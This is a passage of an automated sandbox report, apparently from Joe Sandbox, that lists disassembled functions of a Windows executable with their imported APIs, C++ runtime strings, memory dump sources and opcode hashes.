GetFileSizeEx.KERNEL32 ref: 00007FF75F8C0D6C
SetFilePointer.KERNEL32 ref: 00007FF75F8C0D93
SetEndOfFile.KERNEL32 ref: 00007FF75F8C0DAC
_lseeki64.MSVCRT ref: 00007FF75F8C0DC4
GetFileInformationByHandle.KERNEL32 ref: 00007FF75F8C0DF8
calloc.MSVCRT ref: 00007FF75F8C0E10
calloc.MSVCRT ref: 00007FF75F8C0E22
FindFirstVolumeW.KERNEL32 ref: 00007FF75F8C0E44
GetVolumeInformationW.KERNEL32 ref: 00007FF75F8C0EBB
FindVolumeClose.KERNEL32 ref: 00007FF75F8C0ECE
free.MSVCRT ref: 00007FF75F8C0ED7
GetDiskFreeSpaceExW.KERNEL32 ref: 00007FF75F8C0EEA
free.MSVCRT ref: 00007FF75F8C0EF6
_errno.MSVCRT ref: 00007FF75F8C0F30
GetLastError.KERNEL32 ref: 00007FF75F8C0F45
_errno.MSVCRT ref: 00007FF75F8C0F52
_errno.MSVCRT ref: 00007FF75F8C0F60

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: File$Volume_errno$FindInformationcallocfree$CloseDiskErrorFirstFreeHandleLastPointerSizeSpaceType_lseeki64
String ID:
API String ID: 2216966719-0
Opcode ID: 7b4704b6215eda3fbabad6741b8a690ac475d18575dfad86c8848813b999d4c8
Instruction ID: 6e400036c793947fe6b559a2c7ec364a02b0fbdaad5720ae1344165bb5bbbaa9
Opcode Fuzzy Hash: 7b4704b6215eda3fbabad6741b8a690ac475d18575dfad86c8848813b999d4c8
Instruction Fuzzy Hash: 7151A421A2C78242F6507F25A4143BAA290EF41BE0FD80231EA6D8F7D5DF3CF4959B20

Function 00007FF75F8E2AF0 Relevance: 23.3, APIs: 12, Strings: 3, Instructions: 814stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF75F8E2B4D
strlen.MSVCRT ref: 00007FF75F8E2B63
strlen.MSVCRT ref: 00007FF75F8E2BAD
strlen.MSVCRT ref: 00007FF75F8E2C16
strlen.MSVCRT ref: 00007FF75F8E2C7F
strlen.MSVCRT ref: 00007FF75F8E2CEB

Strings

*, xrefs: 00007FF75F8E308F
cannot create shim for unknown locale::facet, xrefs: 00007FF75F8E39E5
basic_string::append, xrefs: 00007FF75F8E2E02, 00007FF75F8E2E21, 00007FF75F8E2E2D, 00007FF75F8E2E39

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append$cannot create shim for unknown locale::facet
API String ID: 551667898-2910022950
Opcode ID: 39f785a038af8ea2b5edaf222184e2212c0a3b6d2275a16199ca644727cafcb2
Instruction ID: 6f359a18295190208d974f9e831b4f5e4129a8706d62e4a9bfe649bd2e677673
Opcode Fuzzy Hash: 39f785a038af8ea2b5edaf222184e2212c0a3b6d2275a16199ca644727cafcb2
Instruction Fuzzy Hash: 3282A772A09F8582E710AF15E4543AEB7A0FB44B84F888139CB8D4B795DF3DE465D3A0

Function 00007FF75F8C1A90 Relevance: 20.9, APIs: 8, Strings: 3, Instructions: 1658stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8C1AF4

Strings

, xrefs: 00007FF75F8C34A4
!, xrefs: 00007FF75F8C3A76
inity, xrefs: 00007FF75F8C3454

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID: $!$inity
API String ID: 39653677-2254741344
Opcode ID: e98eb23fadee796f205fd82b99a0aa54f1fffd09365f3312f97d717618aef51f
Instruction ID: 0977ae30c4401e0e1b945048ec86629fc21fdf07b129cc924746d20952b3df55
Opcode Fuzzy Hash: e98eb23fadee796f205fd82b99a0aa54f1fffd09365f3312f97d717618aef51f
Instruction Fuzzy Hash: CFF2A032A0C7C68AE760AF25A4407EAF7A1FB84740F984135DA894FB89DF7CF4559B10

Function 00007FF75F94EEE0 Relevance: 18.0, APIs: 9, Strings: 2, Instructions: 1463COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F94F391, 00007FF75F94F82D, 00007FF75F950A5D, 00007FF75F950AD5, 00007FF75F950C05
basic_string::append, xrefs: 00007FF75F94F861, 00007FF75F950A7D, 00007FF75F950B62

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: memcpy
String ID: basic_string: construction from null is not valid$basic_string::append
API String ID: 3510742995-51681568
Opcode ID: 22bccc7950be02a72d61b7d6d8a4952ed2875b4e045c5c25a078b7a8426361f8
Instruction ID: cf833e9c3ff362194129c87c87d237afb2bd81e9d3104ff702f60b382f8e252f
Opcode Fuzzy Hash: 22bccc7950be02a72d61b7d6d8a4952ed2875b4e045c5c25a078b7a8426361f8
Instruction Fuzzy Hash: 78E25F72A09FC680EA71AB15E4543EAE3A0FB98B84F884131DA9D87B9DDF3CD445C750

Function 00007FF75F8BD710 Relevance: 15.4, APIs: 4, Strings: 6, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 00007FF75F8BD761
strlen.MSVCRT ref: 00007FF75F8BD86E

Strings

_GLOBAL_, xrefs: 00007FF75F8BD757
_, xrefs: 00007FF75F8BDAF9
_, xrefs: 00007FF75F8BD7BD
Z, xrefs: 00007FF75F8BD7C7
Z, xrefs: 00007FF75F8BD92E
_, xrefs: 00007FF75F8BD921

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlenstrncmp
String ID: Z$Z$_$_$_$_GLOBAL_
API String ID: 1310274236-662103887
Opcode ID: fb1dea34fda34d883f7d5c5d79716cf747850302a99be72d2fdf765eaa6495c0
Instruction ID: be3319afe25b23c03fe45bed63b632484df05e3193363194b0445a69182f4177
Opcode Fuzzy Hash: fb1dea34fda34d883f7d5c5d79716cf747850302a99be72d2fdf765eaa6495c0
Instruction Fuzzy Hash: BEF1C073A08AC299F720AF3588143FD7BA1BB05748F884531DA5D1F799CF3CAA51A750

Function 00007FF75F8CAC10 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF75F8CAC20
GetProcAddress.KERNEL32 ref: 00007FF75F8CAC37
LoadLibraryW.KERNEL32 ref: 00007FF75F8CAC5F
GetProcAddress.KERNEL32 ref: 00007FF75F8CAC6F

Strings

msvcrt.dll, xrefs: 00007FF75F8CAC19
rand_s, xrefs: 00007FF75F8CAC2D
advapi32.dll, xrefs: 00007FF75F8CAC58
SystemFunction036, xrefs: 00007FF75F8CAC65

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 6195be83927704eff86e8c853455652f2418f3b9a4730fb1f25dfa61422512a8
Instruction ID: b94e91c8c71c2fa135341e18a6c389bd9c2a7beb356721bc69a0f9499981ce6f
Opcode Fuzzy Hash: 6195be83927704eff86e8c853455652f2418f3b9a4730fb1f25dfa61422512a8
Instruction Fuzzy Hash: 50F0F964A1AE8781FE45BB55F8540F8A3A4AF44780BC80132C88D8B37CDF2DA4559320

Function 00007FF75F8C8240 Relevance: 12.7, APIs: 8, Instructions: 708COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00007FF75F8C8261

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: localeconv
String ID:
API String ID: 3737801528-0
Opcode ID: f3301fd0b74d026327ac4eb281251bbda2a2c12871cbbdeccba1631332ece7c1
Instruction ID: eb92ae9a93e489fdd25586593ed87ef8f4e0ce528d0bc85aa282485a713fc24d
Opcode Fuzzy Hash: f3301fd0b74d026327ac4eb281251bbda2a2c12871cbbdeccba1631332ece7c1
Instruction Fuzzy Hash: FB52DF72A483D28AEB64AE2494447FFBA91EB45744FCC4131DA494FAC5DF3CF960A720

Function 00007FF75F8DDE20 Relevance: 12.1, APIs: 3, Strings: 4, Instructions: 1603COMMON

Download Yara Rule

Strings

uninitialized __any_string, xrefs: 00007FF75F8DE488, 00007FF75F8DEC1E
m, xrefs: 00007FF75F8DE06C
uninitialized __any_string, xrefs: 00007FF75F8DE69E, 00007FF75F8DEE27
std::bad_exception, xrefs: 00007FF75F8DF8B0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: m$std::bad_exception$uninitialized __any_string$uninitialized __any_string
API String ID: 0-4007098236
Opcode ID: 8e7bc0dc7780918473bce696930b7bb20cb3417e893949cdd3cff117d4b9dcf0
Instruction ID: 62e40500d2dfaa832521c65b3dfb1a10a159291748d46ed6ffc21448e5d0b9af
Opcode Fuzzy Hash: 8e7bc0dc7780918473bce696930b7bb20cb3417e893949cdd3cff117d4b9dcf0
Instruction Fuzzy Hash: 67E21836609BC485D7A09B26F4407EAB7A4FB89B94F948126EECC87B58DF3CD055CB10

Function 00007FF75F8CF8B0 Relevance: 10.6, APIs: 7, Instructions: 108COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF75F8CF967
IsDebuggerPresent.KERNEL32 ref: 00007FF75F8CF98C
RaiseException.KERNEL32 ref: 00007FF75F8CF9B2
mbstowcs.MSVCRT ref: 00007FF75F8CF9CE
malloc.MSVCRT ref: 00007FF75F8CF9E1
mbstowcs.MSVCRT ref: 00007FF75F8CF9F7
free.MSVCRT ref: 00007FF75F8CFA0A

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: freembstowcs$DebuggerExceptionPresentRaisemalloc
String ID:
API String ID: 3725749409-0
Opcode ID: 7d3dfe65fe42c0d6652a96e233f5ca0822635b6884d9a4897ee2127c397daaf6
Instruction ID: 2f837fe27095cef1d5fdcb3417d9b29328afa809fea3e00ce9343a3378c7f662
Opcode Fuzzy Hash: 7d3dfe65fe42c0d6652a96e233f5ca0822635b6884d9a4897ee2127c397daaf6
Instruction Fuzzy Hash: 06419022A0878281FA64BF26A4053F9E290AF44798F8C8235EE5E5F7D5DF3CF4509720

Function 00007FF75F8C6840 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1475COMMON

Download Yara Rule

Strings

, xrefs: 00007FF75F8C7ECA
NaN, xrefs: 00007FF75F8C6AF8
, xrefs: 00007FF75F8C81B8
Infinity, xrefs: 00007FF75F8C6B78

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: cf006a216cfd5a45714d87f936f526718afe2d5a5b1a48c42635e94528737d12
Instruction ID: 3c5cf95ec0e4abcfae22d2401e7c8884db78e419573af48b9e2b230c20d7183c
Opcode Fuzzy Hash: cf006a216cfd5a45714d87f936f526718afe2d5a5b1a48c42635e94528737d12
Instruction Fuzzy Hash: 28D26F32A1C7C18AE7519F25A4407AEFBA1FB84780F584135EA8A4BB99DF3DF4509F10

Function 00007FF75F937A40 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 195COMMON

Download Yara Rule

Strings

basic_string::erase, xrefs: 00007FF75F937AFA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F937B01

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
API String ID: 0-2652434754
Opcode ID: 2e2b6efdbd79326570f1a66c120926edcd7908f802ccfc9ed2d841f91089931f
Instruction ID: 4c3de8ad6902615054cd8ce8c7564538d5f368192d85531a451f5a95b4cf58bd
Opcode Fuzzy Hash: 2e2b6efdbd79326570f1a66c120926edcd7908f802ccfc9ed2d841f91089931f
Instruction Fuzzy Hash: A371C076B19E8A84DA50AF19D4046FDA3A0BB45BD4F988531DF4C973E8EF38D480C351

Function 00007FF75F8BF096 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF75F8BF0B5

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 9f8dda352f6cb50768de31b8ccf901b79e4bcf59fe841be1b37cc6e6e82d473f
Instruction ID: c2a6e0ae0bceeb0d03cda7a3a809884fa15de59963c8f101effc32773222015f
Opcode Fuzzy Hash: 9f8dda352f6cb50768de31b8ccf901b79e4bcf59fe841be1b37cc6e6e82d473f
Instruction Fuzzy Hash: D5218B60E182C746FA6A72A8C4653F992829F89350F9C8935C91D8E3D1CF1DBCA1A235

Function 00007FF75F94D180 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 601COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F94D75E
Cannot convert character sequence, xrefs: 00007FF75F94D9D9
*, xrefs: 00007FF75F94D9C6

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: *$Cannot convert character sequence$basic_string: construction from null is not valid
API String ID: 0-1336839915
Opcode ID: fd6f9fbe49629f10d2dc253a067fe5d49f0bbc93ed45aa7e4b5bac0e0b1dd7c0
Instruction ID: e0aacc751a5346c70b1ca01ecd216bb0ab9a366532122b6a4b918f8b9e66118d
Opcode Fuzzy Hash: fd6f9fbe49629f10d2dc253a067fe5d49f0bbc93ed45aa7e4b5bac0e0b1dd7c0
Instruction Fuzzy Hash: 27428C76A18FC581DB60AB15E4487AAB7A0FB95B94F884236DE9D83B9CDF3CD044C710

Function 00007FF75F8FEFD0 Relevance: 5.4, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

basic_string::erase, xrefs: 00007FF75F8FF9E8
basic_string::append, xrefs: 00007FF75F8FF967, 00007FF75F8FF9A0, 00007FF75F8FF9C4, 00007FF75F8FFA25
, xrefs: 00007FF75F8FF4B0
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F8FF9EF

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
API String ID: 0-3660802673
Opcode ID: e01f3154ee16696f63d5e6906ba7627399006d1421de0a8461606c69d813896c
Instruction ID: a4321caa1d90131ad9e9b797b5d1f1fb15d4f2867dacc170ae8fff138e60643e
Opcode Fuzzy Hash: e01f3154ee16696f63d5e6906ba7627399006d1421de0a8461606c69d813896c
Instruction Fuzzy Hash: 4A129E72608BC285EB60EF25E4403AEB365FB94B84F884135EA8D4B799DF3CE454D720

Function 00007FF75F8FE530 Relevance: 5.4, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

basic_string::erase, xrefs: 00007FF75F8FEF48
basic_string::append, xrefs: 00007FF75F8FEEC7, 00007FF75F8FEF00, 00007FF75F8FEF24, 00007FF75F8FEF85
, xrefs: 00007FF75F8FEA10
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F8FEF4F

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
API String ID: 0-3660802673
Opcode ID: ad15aa3dbffbf6b3361315da532d5565a6948d597d80461883f95b82a729c5aa
Instruction ID: 8291392c5984f5f8795c644ea3efb0c81faf3bc0d1e68b7bc8c72d05c3ba8d72
Opcode Fuzzy Hash: ad15aa3dbffbf6b3361315da532d5565a6948d597d80461883f95b82a729c5aa
Instruction Fuzzy Hash: 82129D72608BC185EB60EF25E4403EAB365FB94B84F885135EA8D4B799DF3CE450C760

Function 00007FF75F8D7E80 Relevance: 5.0, APIs: 1, Strings: 2, Instructions: 497COMMON

Download Yara Rule

Strings

basic_string::erase, xrefs: 00007FF75F8D8715
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F8D871C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
API String ID: 0-2652434754
